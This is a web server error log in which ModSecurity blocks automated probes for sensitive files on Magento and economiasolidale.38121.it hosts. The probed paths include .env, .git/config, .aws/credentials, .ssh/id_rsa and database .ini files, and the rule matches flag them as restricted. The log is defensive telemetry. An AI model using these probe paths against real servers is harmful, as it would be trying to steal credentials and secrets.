[Thu Feb 06 16:27:20.600663 2025] [authz_core:error] [pid 967678] [client 185.165.171.109:54330] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml_test, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:21.197459 2025] [authz_core:error] [pid 967674] [client 185.165.171.109:54342] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml_live, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:21.599689 2025] [authz_core:error] [pid 968039] [client 185.165.171.109:54354] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml_staging, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:21.599690 2025] [authz_core:error] [pid 967676] [client 185.165.171.109:54368] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.local, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:21.602621 2025] [authz_core:error] [pid 968042] [client 185.165.171.109:54358] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.new, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:21.603146 2025] [authz_core:error] [pid 967679] [client 185.165.171.109:54346] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.old, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:22.716855 2025] [authz_core:error] [pid 980164] [client 185.165.171.109:54382] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmllive, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:22.721990 2025] [authz_core:error] [pid 980163] [client 185.165.171.109:54380] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmltest, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:22.907893 2025] [authz_core:error] [pid 967675] [client 185.165.171.109:54396] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmllocal, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:25.038161 2025] [authz_core:error] [pid 967677] [client 185.165.171.109:54408] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmlstaging, referer: https://economiasolidale.38121.it/
[Fri Feb 07 01:30:30.294299 2025] [:error] [pid 987203] [client 54.90.53.5:44142] [client 54.90.53.5] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z6VUJoOSZhrLzXav9YgsyAAAAAQ"]
[Fri Feb 07 01:30:30.295160 2025] [:error] [pid 987203] [client 54.90.53.5:44142] [client 54.90.53.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z6VUJoOSZhrLzXav9YgsyAAAAAQ"]
[Fri Feb 07 01:30:30.295597 2025] [:error] [pid 987203] [client 54.90.53.5:44142] [client 54.90.53.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z6VUJoOSZhrLzXav9YgsyAAAAAQ"]
[Sat Feb 08 02:54:28.395112 2025] [:error] [pid 1012389] [client 185.246.189.156:35554] [client 185.246.189.156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z6a5VJWgbnbMeZFmNmE4LwAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:28.396196 2025] [:error] [pid 1012389] [client 185.246.189.156:35554] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z6a5VJWgbnbMeZFmNmE4LwAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:28.396716 2025] [:error] [pid 1012389] [client 185.246.189.156:35554] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z6a5VJWgbnbMeZFmNmE4LwAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:28.412210 2025] [:error] [pid 1008926] [client 185.246.189.156:35566] [client 185.246.189.156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_"] [unique_id "Z6a5VKZ-LgHKb506ZEHfQgAAAAA"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:28.412982 2025] [:error] [pid 1008926] [client 185.246.189.156:35566] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_"] [unique_id "Z6a5VKZ-LgHKb506ZEHfQgAAAAA"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:28.413409 2025] [:error] [pid 1008926] [client 185.246.189.156:35566] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_"] [unique_id "Z6a5VKZ-LgHKb506ZEHfQgAAAAA"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:28.818748 2025] [:error] [pid 1008929] [client 185.246.189.156:35578] [client 185.246.189.156] ModSecurity: Warning. Matched phrase ".bash_history" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .bash_history found within REQUEST_FILENAME: /.bash_history"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "Z6a5VLMoa41D4znMw92YkAAAAAc"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:28.819944 2025] [:error] [pid 1008929] [client 185.246.189.156:35578] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "Z6a5VLMoa41D4znMw92YkAAAAAc"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:28.820425 2025] [:error] [pid 1008929] [client 185.246.189.156:35578] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "Z6a5VLMoa41D4znMw92YkAAAAAc"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:29.240936 2025] [:error] [pid 1009125] [client 185.246.189.156:35572] [client 185.246.189.156] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "Z6a5Va4TmBuXicnWnYopMAAAAAM"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:29.241849 2025] [:error] [pid 1009125] [client 185.246.189.156:35572] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "Z6a5Va4TmBuXicnWnYopMAAAAAM"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:29.242354 2025] [:error] [pid 1009125] [client 185.246.189.156:35572] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "Z6a5Va4TmBuXicnWnYopMAAAAAM"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:29.562920 2025] [:error] [pid 1012387] [client 185.246.189.156:35626] [client 185.246.189.156] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "Z6a5VSdHPTLnhTwZ0Tjl8QAAAAg"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:29.563888 2025] [:error] [pid 1012387] [client 185.246.189.156:35626] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "Z6a5VSdHPTLnhTwZ0Tjl8QAAAAg"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:29.564393 2025] [:error] [pid 1012387] [client 185.246.189.156:35626] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "Z6a5VSdHPTLnhTwZ0Tjl8QAAAAg"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.134711 2025] [:error] [pid 1008929] [client 185.246.189.156:34186] [client 185.246.189.156] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "Z6a5X7Moa41D4znMw92YkgAAAAc"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.135355 2025] [:error] [pid 1008929] [client 185.246.189.156:34186] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "Z6a5X7Moa41D4znMw92YkgAAAAc"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.135699 2025] [:error] [pid 1008929] [client 185.246.189.156:34186] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "Z6a5X7Moa41D4znMw92YkgAAAAc"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.295887 2025] [:error] [pid 1012450] [client 185.246.189.156:34178] [client 185.246.189.156] ModSecurity: Warning. Matched phrase ".ssh/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/config found within REQUEST_FILENAME: /.ssh/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/config"] [unique_id "Z6a5X5auqcLpi7kGZoDNXAAAAAs"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.296390 2025] [:error] [pid 1012450] [client 185.246.189.156:34178] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/config"] [unique_id "Z6a5X5auqcLpi7kGZoDNXAAAAAs"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.296624 2025] [:error] [pid 1012450] [client 185.246.189.156:34178] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/config"] [unique_id "Z6a5X5auqcLpi7kGZoDNXAAAAAs"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.607688 2025] [:error] [pid 1008961] [client 185.246.189.156:34182] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/install.ini"] [unique_id "Z6a5X9PCPzuZ5FKaAwAvuAAAAAI"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.609259 2025] [:error] [pid 1008961] [client 185.246.189.156:34182] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/install.ini"] [unique_id "Z6a5X9PCPzuZ5FKaAwAvuAAAAAI"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.609756 2025] [:error] [pid 1008961] [client 185.246.189.156:34182] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/install.ini"] [unique_id "Z6a5X9PCPzuZ5FKaAwAvuAAAAAI"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.968805 2025] [:error] [pid 1008927] [client 185.246.189.156:34184] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/db.ini"] [unique_id "Z6a5Xznzdx-AECRrd0ZyigAAAAE"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.970323 2025] [:error] [pid 1008927] [client 185.246.189.156:34184] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/db.ini"] [unique_id "Z6a5Xznzdx-AECRrd0ZyigAAAAE"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:39.970819 2025] [:error] [pid 1008927] [client 185.246.189.156:34184] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/db.ini"] [unique_id "Z6a5Xznzdx-AECRrd0ZyigAAAAE"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:42.894122 2025] [:error] [pid 1012456] [client 185.246.189.156:34206] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/database.ini"] [unique_id "Z6a5YgurHlE6Y7pUFpYhhgAAAA0"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:42.896752 2025] [:error] [pid 1012456] [client 185.246.189.156:34206] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database.ini"] [unique_id "Z6a5YgurHlE6Y7pUFpYhhgAAAA0"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:42.897220 2025] [:error] [pid 1012456] [client 185.246.189.156:34206] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database.ini"] [unique_id "Z6a5YgurHlE6Y7pUFpYhhgAAAA0"], referer: https://economiasolidale.38121.it/
